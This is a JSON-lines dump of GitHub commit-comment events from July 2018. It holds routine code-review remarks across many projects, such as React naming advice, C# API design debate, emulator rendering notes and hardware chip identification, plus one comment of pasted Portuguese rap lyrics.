{"id":"7912161308","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29579701,"position":27,"line":27,"path":"hw4naz/App.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:14:17Z","updated_at":"2018-07-03T12:14:17Z","author_association":"NONE","body":"Не очень дескриптивное название поля – не сразу понятно, за что оно отвечает. Тут, наверно, лучше подошло бы что-то вроде `addFriendModalShown` или `friendAdderModalShow`."}},"created_at":"2018-07-03T12:14:17Z"}
{"id":"7912161465","type":"CommitCommentEvent","actor":{"login":"stevstrong"},"repo":{"name":"rogerclarkmelbourne/Arduino_STM32"},"payload":{"comment":{"id":29579704,"position":null,"line":null,"path":null,"commit_id":"85eb51aacb3b6ceaf1575112cd363eb9d3a4649b","created_at":"2018-07-03T12:14:19Z","updated_at":"2018-07-03T12:14:19Z","author_association":"CONTRIBUTOR","body":"It looks good to me."}},"created_at":"2018-07-03T12:14:19Z"}
{"id":"7912162709","type":"CommitCommentEvent","actor":{"login":"martinayotte"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29579707,"position":null,"line":null,"path":null,"commit_id":"ede66919cf0d18783a9b2ee2ee67c7fbf2f5d19f","created_at":"2018-07-03T12:14:34Z","updated_at":"2018-07-03T12:14:34Z","author_association":"CONTRIBUTOR","body":"@StefanMavrodiev , believe me, my board has a 48 pins TSOP, with mark 6WA28JMB16, for which I can't find info in Google. Remember that those board was engineering sample shipped to @igorpecovnik "}},"created_at":"2018-07-03T12:14:34Z"}
{"id":"7912163052","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29579708,"position":14,"line":206,"path":"addons/mrp/models/stock_move.py","commit_id":"c825bbcd6f88b23bcb07cd1aa008047af8e67e59","created_at":"2018-07-03T12:14:38Z","updated_at":"2018-07-03T12:14:38Z","author_association":"NONE","body":"@jco-odoo it's a patch for a customer, but we plan to fix it in master\r\nwe also plan to add a \"is_make_to_order\" field on the routes computed on their rules"}},"created_at":"2018-07-03T12:14:38Z"}
{"id":"7912171432","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29579730,"position":33,"line":33,"path":"hw4naz/App.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:16:17Z","updated_at":"2018-07-03T12:16:17Z","author_association":"NONE","body":"Традиционно, в react / react-native, методы отвечающие за отлавливание событий называются `handleEvent`. Пропы, соответственно называются `onEvent`.\r\n\r\nТо есть тут лучше подошло бы `handleNameChange`."}},"created_at":"2018-07-03T12:16:17Z"}
{"id":"7912173358","type":"CommitCommentEvent","actor":{"login":"jco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29579736,"position":14,"line":206,"path":"addons/mrp/models/stock_move.py","commit_id":"c825bbcd6f88b23bcb07cd1aa008047af8e67e59","created_at":"2018-07-03T12:16:40Z","updated_at":"2018-07-03T12:16:40Z","author_association":"NONE","body":"cool\n\nOn Tue, Jul 3, 2018 at 2:14 PM, Simon Lejeune <notifications@github.com>\nwrote:\n\n> @jco-odoo <https://github.com/jco-odoo> it's a patch for a customer, but\n> we plan to fix it in master\n> we also plan to add a \"is_make_to_order\" field on the routes computed on\n> their rules\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/odoo-dev/odoo/commit/c825bbcd6f88b23bcb07cd1aa008047af8e67e59#commitcomment-29579708>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADp7e89XogIslAH8dBrcbZbGjUNOOdWxks5uC2AvgaJpZM4VAz9V>\n> .\n>\n"}},"created_at":"2018-07-03T12:16:40Z"}
{"id":"7912173789","type":"CommitCommentEvent","actor":{"login":"jcarsique"},"repo":{"name":"nuxeo/nuxeo-java-client"},"payload":{"comment":{"id":29579737,"position":null,"line":null,"path":null,"commit_id":"a04d948040768f695290e6ff02e7d41d574faceb","created_at":"2018-07-03T12:16:47Z","updated_at":"2018-07-03T12:16:47Z","author_association":"MEMBER","body":"JAVACLIENT-157"}},"created_at":"2018-07-03T12:16:47Z"}
{"id":"7912173934","type":"CommitCommentEvent","actor":{"login":"semaforup"},"repo":{"name":"semaforup/trabalho01"},"payload":{"comment":{"id":29579739,"position":null,"line":null,"path":null,"commit_id":"11afc4c46e269b1de0e8f676a033cb5b503d11f0","created_at":"2018-07-03T12:16:48Z","updated_at":"2018-07-03T12:16:48Z","author_association":"OWNER","body":"Fernvndx Clothing nego\r\nRaffa moreira mano\r\n777, (Skr skr skr), ay ay ay\r\nYeah, ay ay ay\r\n\r\nBro, faz sol\r\nCamisa da Fernvndx Clothing\r\nEu soquei um hater no shopping\r\nQue falou bosta\r\nWow, óculos do Kurt Cobain\r\nDouble cup, Sprite, Codein\r\nTodo mundo fala de mim\r\nRaffa Moreira mano\r\n\r\nJoguei um beck de gr\r\nNa seda branca queima\r\nJoguei codeina na minha fanta\r\nPostei o lançamento da minha blusa\r\nHater falou mal, ele é uma puta\r\nO que eu faço é hype, de fato eu sou foda\r\nMeus fãs reais nunca me viram as costas\r\nEles acham minha calça apertada style\r\nEles sabem sou gangsta paradise\r\n\r\nYo, faz sol\r\nCamisa da Fernvndx Clothing\r\nEu soquei um hater no shopping\r\nQue falou bosta\r\nWow, óculos do Kurt Cobain\r\nDouble cup, Sprite, Codein\r\nTodo mundo fala de mim\r\nRaffa Moreira mano\r\n\r\nTodos os jovens agora falam minhas gírias\r\nEles perguntam onde compro minhas roupas\r\nPor isso eu investi na minha marca\r\nMeu swag esta no nivel dez milhões\r\nSai fora com essas marca de playboy tipo a palace\r\nFernvndx clothing squad, squad raffa, não pare\r\n\r\nAy, ay, ay, ay, ay\r\nAy, ay, ay, ay, ay\r\nAy, ay, ay, ay, ay\r\n\r\nBro, faz sol\r\nCamisa da Fernvndx Clothing\r\nEu soquei um hater no shopping\r\nQue falou bosta\r\nWow, óculos do Kurt Cobain\r\nDouble cup, Sprite, Codein\r\nTodo mundo fala de mim\r\nRaffa Moreira mano"}},"created_at":"2018-07-03T12:16:48Z"}
{"id":"7912174057","type":"CommitCommentEvent","actor":{"login":"jmockbee"},"repo":{"name":"jmockbee/React-Guide1"},"payload":{"comment":{"id":29579740,"position":6,"line":12,"path":"src/Person/Person.js","commit_id":"ccbf9710e78bef982514fbe5282c83cf885f0dd4","created_at":"2018-07-03T12:16:50Z","updated_at":"2018-07-03T12:16:50Z","author_association":"OWNER","body":"neede to add this to type into text box \r\n <input type=\"text\" onChange={props.changed} value= {props.name}/>\r\n"}},"created_at":"2018-07-03T12:16:50Z"}
{"id":"7912174897","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29579745,"position":39,"line":39,"path":"hw4naz/App.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:17:00Z","updated_at":"2018-07-03T12:17:00Z","author_association":"NONE","body":"Аналогично, как говорил выше, не очень понятное названия метода. Если показывается экран добавления друга, то лучше было бы назвать `showAddFriendModal`."}},"created_at":"2018-07-03T12:17:00Z"}
{"id":"7912176918","type":"CommitCommentEvent","actor":{"login":"connectdeveloper"},"repo":{"name":"connectrajendra/Demo"},"payload":{"comment":{"id":29579754,"position":4,"line":8,"path":"DemoWebsite/DemoWebsite/Views/Test/Index.cshtml","commit_id":"22a0a90f89d29b2be225631dc5fdc6fcdc15bc5e","created_at":"2018-07-03T12:17:25Z","updated_at":"2018-07-03T12:17:25Z","author_association":"CONTRIBUTOR","body":"Bad Programming"}},"created_at":"2018-07-03T12:17:25Z"}
{"id":"7912179138","type":"CommitCommentEvent","actor":{"login":"connectdeveloper"},"repo":{"name":"connectrajendra/Demo"},"payload":{"comment":{"id":29579761,"position":null,"line":null,"path":null,"commit_id":"22a0a90f89d29b2be225631dc5fdc6fcdc15bc5e","created_at":"2018-07-03T12:17:54Z","updated_at":"2018-07-03T12:17:54Z","author_association":"CONTRIBUTOR","body":"Rajesh ji bad programming"}},"created_at":"2018-07-03T12:17:54Z"}
{"id":"7912180385","type":"CommitCommentEvent","actor":{"login":"OliverO2"},"repo":{"name":"rear/rear"},"payload":{"comment":{"id":29579769,"position":14,"line":79,"path":"usr/share/rear/output/RAWDISK/Linux-i386/280_create_bootable_disk_image.sh","commit_id":"bcb0ed3e01d5e9225c6e243bb4971de90ea3c57b","created_at":"2018-07-03T12:18:10Z","updated_at":"2018-07-03T12:18:10Z","author_association":"CONTRIBUTOR","body":"Yes, the order is intentional:\r\n* The kernel will update its partition tables and create partition device nodes asynchronously. Even `partprobe` will not wait for these operations to complete.\r\n* If `kpartx` kicks in too early, everything will mess up as both, the kernel and kpartx will then try to create the same device nodes in parallel. Depending on the exact timing, this will lead to an error `Device or resource busy` or maybe just a message in the system log.\r\n* `kpartx` in turn is called with the _synchronous_ option. If it returns, device nodes will have been created. So there is no need to wait afterwards."}},"created_at":"2018-07-03T12:18:10Z"}
{"id":"7912181398","type":"CommitCommentEvent","actor":{"login":"Ronimeister"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29579773,"position":11,"line":11,"path":"Algorithms/GCDFinder.cs","commit_id":"4ff58661eda38d9d564017029a28a9a1016daa30","created_at":"2018-07-03T12:18:21Z","updated_at":"2018-07-03T12:18:21Z","author_association":"OWNER","body":"Была идея объединить методы EuclidianGCD и SteinGCD в один, стоило сделать\r\nтак?\r\n\r\n3 июля 2018 г., 13:49 пользователь Anzhelika Kravchuk <\r\nnotifications@github.com> написал:\r\n\r\n> Категорически не согласна с публичным api, столько хороших идей отдельных,\r\n> но все вместе они дали какофонию в коде, увы( Нужно завтра обязательно\r\n> обговорить!\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29578763>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AeM1XnhVX_KIGOYRrn0i2JOX5ar72Rhmks5uC0xMgaJpZM4VAt6f>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-03T12:18:21Z"}
{"id":"7912182473","type":"CommitCommentEvent","actor":{"login":"StefanMavrodiev"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29579776,"position":null,"line":null,"path":null,"commit_id":"ede66919cf0d18783a9b2ee2ee67c7fbf2f5d19f","created_at":"2018-07-03T12:18:34Z","updated_at":"2018-07-03T12:18:34Z","author_association":"CONTRIBUTOR","body":"@martinayotte **6WA28JMB16** is eMMC chip (MTFC4GACAANA-4M). I think you're confused, because of the chip size. If you look closer, you'll see that the pads are not soldered."}},"created_at":"2018-07-03T12:18:34Z"}
{"id":"7912185244","type":"CommitCommentEvent","actor":{"login":"muhrik"},"repo":{"name":"thomasmari/CZK_project"},"payload":{"comment":{"id":29579781,"position":null,"line":null,"path":null,"commit_id":"fb17d8d5e72c62c82fba5e3503853bb419db53cc","created_at":"2018-07-03T12:19:08Z","updated_at":"2018-07-03T12:19:08Z","author_association":"COLLABORATOR","body":"The model has now been fixed in the benchmark (added preemption into the guards for [firstStage] and [secondStage]).\r\nThank you for finding this error."}},"created_at":"2018-07-03T12:19:08Z"}
{"id":"7912185588","type":"CommitCommentEvent","actor":{"login":"FCOLLARD"},"repo":{"name":"vrosinac/autoshutdown"},"payload":{"comment":{"id":29579784,"position":null,"line":null,"path":null,"commit_id":"5f0592b7d215c8fd1184b0463045efe38f1bab3f","created_at":"2018-07-03T12:19:12Z","updated_at":"2018-07-03T12:19:12Z","author_association":"COLLABORATOR","body":"ca me va"}},"created_at":"2018-07-03T12:19:12Z"}
{"id":"7912186681","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29579788,"position":64,"line":64,"path":"hw4naz/App.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:19:24Z","updated_at":"2018-07-03T12:19:24Z","author_association":"NONE","body":"Отлично, что используешь тут callback 👍 "}},"created_at":"2018-07-03T12:19:24Z"}
{"id":"7912193862","type":"CommitCommentEvent","actor":{"login":"Sway112"},"repo":{"name":"Sway112/photobook"},"payload":{"comment":{"id":29579803,"position":9,"line":8,"path":"photoblog.html","commit_id":"04b77978c08910549482d365fac0865146dfa1d8","created_at":"2018-07-03T12:20:49Z","updated_at":"2018-07-03T12:20:49Z","author_association":"OWNER","body":"ok nice"}},"created_at":"2018-07-03T12:20:49Z"}
{"id":"7912197946","type":"CommitCommentEvent","actor":{"login":"lucasatace"},"repo":{"name":"jquery/jquery"},"payload":{"comment":{"id":29579813,"position":null,"line":null,"path":null,"commit_id":"f60729f3903d17917dc351f3ac87794de379b0cc","created_at":"2018-07-03T12:21:36Z","updated_at":"2018-07-03T12:21:36Z","author_association":"NONE","body":"To implement this, do I need to have the offending codebase of jQuery local and customize it from there, or can these files be something that's separate and called in via the HTML?"}},"created_at":"2018-07-03T12:21:36Z"}
{"id":"7912199963","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29579816,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-03T12:22:00Z","updated_at":"2018-07-03T12:22:00Z","author_association":"NONE","body":"OK, I will keep the renderers as-is then but just introduce a GL3 codepath for bump mapping/flat shading."}},"created_at":"2018-07-03T12:22:00Z"}
{"id":"7912200584","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29579819,"position":38,"line":114,"path":"code/Example/Drasil/GamePhysics/Body.hs","commit_id":"b99a40fcbf731fbb5f2465b2eaa6cf19499d5488","created_at":"2018-07-03T12:22:08Z","updated_at":"2018-07-03T12:22:08Z","author_association":"OWNER","body":"Here, and on the next line, it is probably not a good idea to use `nub` directly on `DefinedQuantityDict`, as it relies on that having an `Eq` instance. Probably better to use `nubBy` instead."}},"created_at":"2018-07-03T12:22:08Z"}
{"id":"7912202406","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtBeppu/introPython3_beppu"},"payload":{"comment":{"id":29579825,"position":20,"line":20,"path":"e08/e08_04/e08_04.py","commit_id":"9bfc63ed61055d92a900e1e2f7fb0b3bec41b450","created_at":"2018-07-03T12:22:29Z","updated_at":"2018-07-03T12:22:29Z","author_association":"COLLABORATOR","body":"コメント記入者：卜部\r\n本来、csvの1行目（ヘッダ）がオブジェクトのキー名になるのが望ましいように見えます。\r\nDictReaderを少し調べたところ、実現はできそうなので、教本に記載されているようでしたら修正をお願いします。"}},"created_at":"2018-07-03T12:22:29Z"}
{"id":"7912202895","type":"CommitCommentEvent","actor":{"login":"annamlavanya"},"repo":{"name":"annamlavanya/Hello-world"},"payload":{"comment":{"id":29579827,"position":null,"line":null,"path":null,"commit_id":"4ed55f48cbf8c65701fa726473b5c274c8a250ed","created_at":"2018-07-03T12:22:35Z","updated_at":"2018-07-03T12:22:35Z","author_association":"OWNER","body":"Adding Additional Details to file"}},"created_at":"2018-07-03T12:22:35Z"}
{"id":"7912204805","type":"CommitCommentEvent","actor":{"login":"firetech"},"repo":{"name":"firetech/dotfiles"},"payload":{"comment":{"id":29579829,"position":4,"line":10,"path":"config/screenrc","commit_id":"5110319e65ee0e6db962684019a76317f0ccd967","created_at":"2018-07-03T12:22:58Z","updated_at":"2018-07-03T12:22:58Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-03T12:22:58Z"}
{"id":"7912206403","type":"CommitCommentEvent","actor":{"login":"5FiftySix6"},"repo":{"name":"jozborn/Zote"},"payload":{"comment":{"id":29579830,"position":null,"line":null,"path":null,"commit_id":"3f851f2314b139c351cc1ab3f4c1dcd4dac6c9d4","created_at":"2018-07-03T12:23:17Z","updated_at":"2018-07-03T12:23:17Z","author_association":"NONE","body":"extreme pain"}},"created_at":"2018-07-03T12:23:17Z"}
{"id":"7912206644","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29579832,"position":11,"line":11,"path":"Algorithms/GCDFinder.cs","commit_id":"4ff58661eda38d9d564017029a28a9a1016daa30","created_at":"2018-07-03T12:23:20Z","updated_at":"2018-07-03T12:23:20Z","author_association":"NONE","body":"Идея была хорошая, реализация не годиться. Что я хотела бы увидеть, как доступную публичную функциональность класса - это 3 (или 6 все зависит от варианта возвращения времени счета) перегруженных версии для 1-го алгоритма и 3 (или 6) для 2-го, при этом, я не должна передавать ничего кроме числовых значений. А вот все остальное в плане избавления от копи паста - на ваше усмотрение). Пользователь вашего кода должен знать только то, что он использует именно указанную модификацию для указанного количества числел, и опционально решать - нужно или нет ему время. "}},"created_at":"2018-07-03T12:23:20Z"}
{"id":"7912207346","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29579834,"position":null,"line":null,"path":null,"commit_id":"fad21cce3a0b093b324d0c6574b0a40d2bfa5a81","created_at":"2018-07-03T12:23:28Z","updated_at":"2018-07-03T12:23:28Z","author_association":"OWNER","body":"Why are all these being removed? [I just want to understand, it just seems a little odd]"}},"created_at":"2018-07-03T12:23:28Z"}
{"id":"7912233896","type":"CommitCommentEvent","actor":{"login":"lucasatace"},"repo":{"name":"jquery/jquery"},"payload":{"comment":{"id":29579904,"position":null,"line":null,"path":null,"commit_id":"f60729f3903d17917dc351f3ac87794de379b0cc","created_at":"2018-07-03T12:28:43Z","updated_at":"2018-07-03T12:28:43Z","author_association":"NONE","body":"@msmolka and @mgol \r\n\r\nThanks!!!! Only reason I'm looking is because we failed our PCI scan, so we need something that will get us back compliant."}},"created_at":"2018-07-03T12:28:43Z"}
{"id":"7912236289","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29579910,"position":null,"line":null,"path":null,"commit_id":"e7d1688ae54618c7711b0d28927794890b5eb88b","created_at":"2018-07-03T12:29:12Z","updated_at":"2018-07-03T12:29:12Z","author_association":"OWNER","body":"Sadly Shadow Man still has a mostly black screen. It's a different issue.\r\n\r\nThis commit fixes a case where absolutely nothing is displayed: 0 FPS."}},"created_at":"2018-07-03T12:29:12Z"}
{"id":"7912237358","type":"CommitCommentEvent","actor":{"login":"jerrydonaldwatson"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29579912,"position":null,"line":null,"path":null,"commit_id":"de3daacd3abf2c6c6a131e705aa23af0297d83dd","created_at":"2018-07-03T12:29:24Z","updated_at":"2018-07-03T12:29:24Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-03T12:29:24Z"}
{"id":"7912241089","type":"CommitCommentEvent","actor":{"login":"slozier"},"repo":{"name":"IronLanguages/ironpython3"},"payload":{"comment":{"id":29579921,"position":67,"line":415,"path":"Src/IronPython.Modules/_ctypes/CFuncPtr.cs","commit_id":"1d75d720a4370cb7983a7bd02627503c514f4432","created_at":"2018-07-03T12:30:08Z","updated_at":"2018-07-03T12:30:08Z","author_association":"CONTRIBUTOR","body":"I just copy pasted the ipy2 code."}},"created_at":"2018-07-03T12:30:08Z"}
{"id":"7912241418","type":"CommitCommentEvent","actor":{"login":"Ronimeister"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29579922,"position":11,"line":11,"path":"Algorithms/GCDFinder.cs","commit_id":"4ff58661eda38d9d564017029a28a9a1016daa30","created_at":"2018-07-03T12:30:12Z","updated_at":"2018-07-03T12:30:12Z","author_association":"OWNER","body":"Т.е., сделать методы а-ля EuclideanGCD(int firstNumber, int secondNumber)\r\n+   EuclideanGCD(int firstNumber, int secondNumber, out TimeSpan time) +\r\nEuclideanGCD(int firstNumber, int secondNumber, params int[] numbers) +\r\nEuclideanGCD(int firstNumber, int secondNumber, params int[] numbers , out\r\nTimeSpan time ) ?\r\n\r\n\r\n3 июля 2018 г., 15:23 пользователь Anzhelika Kravchuk <\r\nnotifications@github.com> написал:\r\n\r\n> Идея была хорошая, реализация не годиться. Что я хотела бы увидеть, как\r\n> доступную публичную функциональность класса - это 3 (или 6 все зависит от\r\n> варианта возвращения времени счета) перегруженных версии для 1-го алгоритма\r\n> и 3 (или 6) для 2-го, при этом, я не должна передавать ничего кроме\r\n> числовых значений. А вот все остальное в плане избавления от копи паста -\r\n> на ваше усмотрение). Пользователь вашего кода должен знать только то, что\r\n> он использует именно указанную модификацию для указанного количества\r\n> числел, и опционально решать - нужно или нет ему время.\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579832>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AeM1XrCNbo4ym4xouuMi2d-VLvH4UI6Dks5uC2I4gaJpZM4VAt6f>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-03T12:30:12Z"}
{"id":"7912250836","type":"CommitCommentEvent","actor":{"login":"mhueni"},"repo":{"name":"power-coders/wp-powercoders-theme"},"payload":{"comment":{"id":29579937,"position":22,"line":14,"path":"index.php","commit_id":"8dadf0c34a97f742acb7f4b122f8d890b7a5703a","created_at":"2018-07-03T12:32:00Z","updated_at":"2018-07-03T12:32:00Z","author_association":"CONTRIBUTOR","body":"you could also just use `<?php the_post_thumbnail('full'); ?>` here (instead of lines 11-20). or am I missing something?"}},"created_at":"2018-07-03T12:32:00Z"}
{"id":"7912252568","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29579941,"position":null,"line":null,"path":null,"commit_id":"e7d1688ae54618c7711b0d28927794890b5eb88b","created_at":"2018-07-03T12:32:20Z","updated_at":"2018-07-03T12:32:20Z","author_association":"NONE","body":"I now see the Ubisoft logo appear for a very brief second in Evolution (US version) before the game just shows a black screen from that point on. The UK version works as it has always done."}},"created_at":"2018-07-03T12:32:20Z"}
{"id":"7912253503","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29579943,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-03T12:32:31Z","updated_at":"2018-07-03T12:32:31Z","author_association":"OWNER","body":"Note that having bump mapping without support for flat shading isn't going to hurt. I doubt there would be any visible difference in Rayman 2 for example. If this can simplify your code..."}},"created_at":"2018-07-03T12:32:31Z"}
{"id":"7912259862","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29579953,"position":null,"line":null,"path":null,"commit_id":"087f147ab5af2687fee4d5eb48f4d4d60d8e98c9","created_at":"2018-07-03T12:33:45Z","updated_at":"2018-07-03T12:33:45Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-21](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-21).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-21-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-03T12:33:45Z"}
{"id":"7912259992","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29579954,"position":11,"line":11,"path":"Algorithms/GCDFinder.cs","commit_id":"4ff58661eda38d9d564017029a28a9a1016daa30","created_at":"2018-07-03T12:33:46Z","updated_at":"2018-07-03T12:33:46Z","author_association":"NONE","body":"Вот эти методы EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers) + EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers , out TimeSpan time ) , вообще взрывают мне мозг!\nя не могу ничем оправдать этот int firstNumber, int secondNumber, params int[] numbers список параметров.\n\n> On 3 Jul 2018, at 15:30, Alexey <notifications@github.com> wrote:\n> \n> Т.е., сделать методы а-ля EuclideanGCD(int firstNumber, int secondNumber) \n> + EuclideanGCD(int firstNumber, int secondNumber, out TimeSpan time) + \n> EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers) + \n> EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers , out \n> TimeSpan time ) ? \n> \n> \n> 3 июля 2018 г., 15:23 пользователь Anzhelika Kravchuk < \n> notifications@github.com> написал: \n> \n> > Идея была хорошая, реализация не годиться. Что я хотела бы увидеть, как \n> > доступную публичную функциональность класса - это 3 (или 6 все зависит от \n> > варианта возвращения времени счета) перегруженных версии для 1-го алгоритма \n> > и 3 (или 6) для 2-го, при этом, я не должна передавать ничего кроме \n> > числовых значений. А вот все остальное в плане избавления от копи паста - \n> > на ваше усмотрение). Пользователь вашего кода должен знать только то, что \n> > он использует именно указанную модификацию для указанного количества \n> > числел, и опционально решать - нужно или нет ему время. \n> > \n> > — \n> > You are receiving this because you authored the thread. \n> > Reply to this email directly, view it on GitHub \n> > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579832>, \n> > or mute the thread \n> > <https://github.com/notifications/unsubscribe-auth/AeM1XrCNbo4ym4xouuMi2d-VLvH4UI6Dks5uC2I4gaJpZM4VAt6f> \n> > . \n> > \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579922>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AKCHstnt1g1M5dQDCbP8NuzPO5i1OLt_ks5uC2PVgaJpZM4VAt6f>.\n> \n\n"}},"created_at":"2018-07-03T12:33:46Z"}
{"id":"7912260051","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29579955,"position":87,"line":87,"path":"hw4naz/App.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:33:47Z","updated_at":"2018-07-03T12:33:47Z","author_association":"NONE","body":"Более подходящим названием метода было бы `handleChooseFriend`.\r\n\r\nЕще одно наблюдение из своего опыта: в реакте бывают два типа пропов-коллбеков – методы, вызывающие изменение (мутации) и методы, реагирующие на изменение (реакции).\r\n\r\nТо есть, например:\r\n- 1) проп `onAddFriend` отвечает за то, чтобы добавить нового друга в стейт\r\n- 2) проп `onFriendAdded` просто добавляет какую-то реакцию на добавление друга\r\n\r\nДля того, чтобы различать эти два типа пропов-коллбеков, часто используют специальное правило при именовании. В случае с 1) мутацией используется формат `on<VerbInfinitive><Noun>`, в случае с 2) реакцией используется формат `on<Noun><VerbPastParticiple >`.\r\n\r\nЭто не строгое правило, и информацию об этом ты нигде не найдёшь, наверно. Я для себя обнаружил такую тенденцию и попытался сформировать правило."}},"created_at":"2018-07-03T12:33:47Z"}
{"id":"7912265441","type":"CommitCommentEvent","actor":{"login":"prasanthhs"},"repo":{"name":"dice-group/sask"},"payload":{"comment":{"id":29579962,"position":15,"line":33,"path":"webclient/src/main/resources/static/js/status/Status.js","commit_id":"bd6fe93b2b50c8a9702f6bc97642ada037446bfc","created_at":"2018-07-03T12:34:46Z","updated_at":"2018-07-03T12:34:46Z","author_association":"COLLABORATOR","body":"But you modified typeHeader but not typeList, EmptyMessage and the other types etc. If there is an issue there must be a problem with typeHeader as well?"}},"created_at":"2018-07-03T12:34:46Z"}
{"id":"7912266155","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29579965,"position":113,"line":113,"path":"hw4naz/App.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:34:54Z","updated_at":"2018-07-03T12:34:54Z","author_association":"NONE","body":"Этот стиль ты можешь вынести в стайлшит под полем `buttonBlue`. Лучше когда все стили находятся в одном месте."}},"created_at":"2018-07-03T12:34:54Z"}
{"id":"7912270278","type":"CommitCommentEvent","actor":{"login":"lars18th"},"repo":{"name":"lars18th/mptsd"},"payload":{"comment":{"id":29579977,"position":null,"line":null,"path":null,"commit_id":"d7c04ddbb8957032c56e1f36493a3444d4b9f06d","created_at":"2018-07-03T12:35:42Z","updated_at":"2018-07-03T12:35:42Z","author_association":"OWNER","body":"Instead of forward the distance from the current PCR and the last PCR over **next** packets to read, this patch backguards it to the **previous** packets. So it calculates the needed packets between new PCR packet and the last, and only continues reading packets from this source until the distance is covered. In fact, it slowdown the reading speed from the input buffer using the PCR marks.\r\n\r\nSo, now you can use the parameter `-m 1` (or `-m 3`) and achieve the expected behaviour."}},"created_at":"2018-07-03T12:35:42Z"}
